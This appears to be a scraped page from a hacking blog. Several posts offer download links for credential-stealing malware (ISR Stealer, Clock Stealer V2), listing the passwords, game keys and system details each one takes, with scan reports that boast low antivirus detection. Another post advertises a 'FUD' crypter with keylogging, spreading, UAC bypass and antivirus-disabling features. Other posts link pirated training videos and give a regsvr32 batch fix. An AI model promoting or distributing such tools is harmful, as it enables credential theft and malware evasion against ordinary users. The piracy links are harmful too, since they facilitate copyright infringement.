Mozilla Thunderbird
Yahoo! Mail
Hotmail/MSN mail
Gmail: Google Desktop and Google Talk

DownLad:
http://www.multiupload.com/FJD9KXAJF0

File Info

Report date: 2010-08-10 20:03:12 (GMT 1)
File name: isr-stealer-v0-3-exe
File size: 1968648 bytes
MD5 Hash: 2289e9119f0c994bc6b9e715f684c7db
SHA1 Hash: 192e33b0cffb0a54a9d10229acb86b83db9217d2
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG - PSW.Generic8.IXI
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
http://novirusthanks.org/
__________________


Read More Add your Comment 1 comments


Clock Stealer V2



Envoie/Send :
Nom de L'utilisateur/User Name
Nom du Pc/Computer Name
Systeme d'Exploitation/Operating System
Processeur/Processor
Antivirus
Firewall
ProRat V1.9 (S.Edition)
Version
-CamFro
-FireFox
-PidGin
Cle CD/CD Key
-Unreal Tournament 4
-Unreal Tournament 3
-Quake 4
-Ravenshield
-Pro Evolution Soccer 6
-Industry Giant 2
-Half-Life
-Call of Duty 2
-Company Of Heroes
-Gunman Chronicles
Mots de p***es/P***words
-Firefox
-NoIP
-MSN
-Ie
-Steam
Telechargement/Downloader
-Fichier EXE/EXE File

File Info

Report date: 2010-08-16 18:04:09 (GMT 1)
File name: clock-stealer-v2-exe
File size: 1010688 bytes
MD5 Hash: dfff7f17511c2baf5a5b05a7a0817664
SHA1 Hash: b7bb2e457523a17df5c1776bf1e306a78e5b78f3
Detection rate: 3 on 16 (19%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/Banker.Banker.ayjn
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky - Trojan-Banker.Win32.Banker.ayjn
NOD32 -
Panda -
TrendMicro -
VBA32 - TrojanBanker.Banker.ayjn
VirusBuster -

Scan report generated by

DownLoad:
http://www.2shared.com/file/Vwa5QtV6...tealer_V2.html


Read More Add your Comment 1 comments


Hacking Video Tutorials Free Download: Hacking Revealed Training



                                         Hacking Video Tutorials Free Download

Description: Hacking Revealed 5 Sessions 15 Hours of Interactive Training

In the Hacking Revealed course from LearnKey, system administrators, network security analysts, and IT professionals, who desire a broader understanding of security, learn how to protect their networks from external attack.

Expert instructor Dale Brice-Nash explains what motivates hackers and examines hacker tools.

He will demonstrate potential system vulnerabilities, hacker methodologies, current exploits, and effective approaches to risk management.

At the conclusion of this course, you'll understand how to evaluate hacker threats and how to avoid them.

Download from hotfile:
http://hotfile.com/dl/59927998/e93f945/Learnkey_Hacking_Revealed_5Cds-CBT.part01.rar.html
http://hotfile.com/dl/59928453/eb348c0/Learnkey_Hacking_Revealed_5Cds-CBT.part02.rar.html
http://hotfile.com/dl/59928485/7f2af00/Learnkey_Hacking_Revealed_5Cds-CBT.part03.rar.html
http://hotfile.com/dl/59928488/49b5f26/Learnkey_Hacking_Revealed_5Cds-CBT.part04.rar.html
http://hotfile.com/dl/59927995/bd8ff12/Learnkey_Hacking_Revealed_5Cds-CBT.part05.rar.html
http://hotfile.com/dl/59928420/051892f/Learnkey_Hacking_Revealed_5Cds-CBT.part06.rar.html
http://hotfile.com/dl/59927993/8cbadf7/Learnkey_Hacking_Revealed_5Cds-CBT.part07.rar.html
http://hotfile.com/dl/59927992/875b71b/Learnkey_Hacking_Revealed_5Cds-CBT.part08.rar.html
http://hotfile.com/dl/59927994/403624c/Learnkey_Hacking_Revealed_5Cds-CBT.part09.rar.html

Download from filserve:
http://www.fileserve.com/file/DbkEJc9
http://www.fileserve.com/file/mHfAKEm
http://www.fileserve.com/file/cdq2syc
http://www.fileserve.com/file/3yYSmMZ
http://www.fileserve.com/file/NRXhSaX
http://www.fileserve.com/file/G9MvCG5
http://www.fileserve.com/file/ejVQ78H
http://www.fileserve.com/file/hWx2jB5
http://www.fileserve.com/file/xFzWwV7


Read More Add your Comment 2 comments


Download Total Training – CSS & XHTML for Web Development



Download Total Training – CSS & XHTML for Web Development | 568 MB | 8 hrs

With Total Training for CSS & XHTML Web Development you’ll learn the process of building a structure for your web pages and then styling those web pages so that they look polished and professional, in the style and design you format. Cascading Style Sheets (CSS) is a versatile
scripting language that allows designers great flexibility in terms of the visual appearance for a site they wish to create and affords them the means to change that appearance without having to recode web pages. This flexibility and the best practices you’ll learn during the design process can turn an average web designer into a top notch designer, which will help you build your portfolio and client list.


Course Outline:

Chapter 1: INTRODUCTION TO BUILDING A WEB PAGE (56 min)

1. What is HTML?
2. Setting Up the Text Editor to Create XHTML
3. Creating Your First HTML File
4. Adding Formatting Tags & Previewing in a Browser
5. Getting Started with Cascading Style Sheets
6. How Pages are Served Up
7. Choosing an Editor
8. Project Management

Chapter 2: CREATING HTML DOCUMENTS (63 min)

1. Understanding Tags, Elements & Attributes
2. Defining the Basic Structure with HTML, HEAD & BODY
3. Assigning a Title & Using Paragraphs
4. Using Heading Tags & Whitespace
5. Creating Unordered & Ordered Lists
6. Fine-tuning Tags with Attributes
7. Adding Bold & Italics
8. Understanding How a Browser Reads HTML
9. Doc Types & Browsers

Chapter 3: INTRODUCTION TO CSS (72 min)

1. What is CSS?
2. Internal Style Sheets, Selectors, Properties & Values
3. Building & Applying Class Selectors
4. Grouping Selectors
5. Creating Comments in Your Code
6. Using Div Tags & IDs to Format Layout
7. Understanding the Cascade & Avoiding Conflicts

Chapter 4: ADDING IMAGES (43 min)

1. Image Formats & Production Considerations
2. Optimizing Images for the Web
3. Introducing the IMG Tag
4. Relative vs. Absolute URLs
5. Fine-Tuning with Alt, Width & Height Attributes

Chapter 5: ANCHORS & HYPERLINKS (50 min)

1. Creating Hyperlinks to Outside Websites
2. Creating Hyperlinks Between Documents
3. Linking to Email Addresses
4. Linking to a Specific Part of a Webpage
5. Linking Images

Chapter 6: MORE CSS TECHNIQUES (35 min)

1. Managing CSS with External Style Sheets
2. Setting Hyperlinks with Pseudo-Classes
3. The CSS Box Model: Padding, Borders & Margins
4. Styling Unordered & Ordered Lists with CSS
5. Overriding the Inheritance of Attributes

Chapter 7: ORGANIZING INFORMATION WITH TABLES & DEFINITION LISTS (46 min)

1. Creating Tables & Table Attributes
2. Adding & Formatting Rows & Columns
3. Spanning Rows & Columns
4. Increasing Table Accessibility
5. Using Definition Lists to Organize Definition-Based Data
6. Using HTML Comments

Chapter 8: CREATING LAYOUTS (61 min)

1. Adding a Side Content Div to Your Layout
2. Applying Absolute Positioning
3. Applying Relative Positioning
4. Using the Float & Clear Properties
5. Understanding Overflow
6. Creating Auto-Centering Content
7. Using Fixed Positioning

Chapter 9: INTRODUCTION TO ADOBE¨ DREAMWEAVER¨ (39 min)

1. Getting Started with Dreamweaver & Setting Preferences
2. Creating a Local Site & Importing Files
3. Working in the Code, Design, & Split Views
4. Configuring FTP Options & Publishing Through Synchronization
5. Validating Your Code

Chapter 10: WORKING WITH DREAMWEAVER (21 min)

1. Editing Style Sheets in the CSS Panel
2. Creating Description & Keyword Meta Tags
3. Using Dreamweaver to Preview in a Web Browser
4. Credits

Download from Hotfile
http://hotfile.com/dl/33673770/3e4b9c4/TT-CSS.XHTML.for.Web.Development.part1.rar.html
http://hotfile.com/dl/33673775/9c73fec/TT-
CSS.XHTML.for.Web.Development.part2.rar.html
http://hotfile.com/dl/33673787/cc80aff/TT-
CSS.XHTML.for.Web.Development.part3.rar.html
http://hotfile.com/dl/33673799/b1811cd/TT-CSS.XHTML.for.Web.Development.part4.rar.html

Uploading
http://uploading.com/files/5d827baa/TT-
CSS.XHTML.for.Web.Development.part4.rar/
http://uploading.com/files/5m92c13f/TT-
CSS.XHTML.for.Web.Development.part3.rar/
http://uploading.com/files/dd93d22m/TT-
CSS.XHTML.for.Web.Development.part2.rar/
http://uploading.com/files/29f5eb62/TT-
CSS.XHTML.for.Web.Development.part1.rar/


Read More Add your Comment 16 comments


Fix the problem with seeing secrue sites



 We receive some emails regarding problem on Firefox  certification so,here is the article on this problem,
Now you can see what's hiddenFix the problem with seeing them secrue sites (banks or online stores)

I found this very usefull to me at my work.

What u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these

regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll


and save it as > all file types, and make it something like securefix.bat.

then just run the file and your problem should be gone.


Read More Add your Comment 4 comments


★★★▓[FUD][FREE] Rattus Crypter v1.1 [ULTIMATE STUBS]-Cybergate,Spy-Net,RATS SUPPORT★★



[Image: tapqie.png]


[Image: zn7a6t.png]


[Image: mvly1k.png]

Download Mirror #1

Download Mirror #2

Download Mirror #3





100% Undetected From ALL Anti-Virus Programs
ScanTime FUD
RunTime FUD


100% FUD
100% Undetected
100% Legit
100% Working with ALL RATS


Stealers
User/Pass Stealer
CD Key Stealer
Steam Stealer
App Key Stealer
Windows Key Stealer


Spread
P2P
USB
CD
Forum
Upload
Network


Miscellaneous

Anti-System
UAC Bypass
Fake Error
KeyLogger
Add to Startup
Downloader
Hide in TaskManager


Other
SMTP
Port
Email support
Icon changer
ALL RATS Support
And lots lots more.


Anti-System
AOL Active Virus Shield
Avast! Free Antivirus
Avast! Pro Antivirus and Internet Security
AVG Anti-Virus
AVG Anti-Virus Free
Avira AntiVir Personal - Free Antivirus
Avira AntiVir Premium
AVZ
BitDefender
BitDefender Free Edition
BullGuard
CA Anti-Virus
Clam AntiVirus
ClamWin
Comodo AntiVirus
Dr. Web
Dr. Web CureIt
ESET
F-Prot
F-Secure
Fortinet FortiClient End Point Security
G DATA Software
Graugon AntiVirus
Immunet Protect
Intego VirusBarrier
Kaspersky Anti-Virus
McAfee VirusScan
Microsoft Security Essentials
rman
Panda Antivirus
Panda Cloud Antivirus
PC Tools AntiVirus
PC Tools AntiVirus Free Edition
Quick Heal AntiVirus
Sophos Anti-Virus
Symantec rton AntiVirus/rton 360
Trend Micro Internet Security
Vba32Antivirus
Sunbelt Software VIPRE Antivirus + Antispyware
VirusBuster
ZoneAlarm Antivirus
INBATE AntiVirus

ALL OTHER LEADING ANTI-VIRUS/ANTI-MALWARE PROGRAMS*


Credits-
toxic~icon changer+binder source




[Video] How To Bypass Sh.are.Cash


Read More Add your Comment 6 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com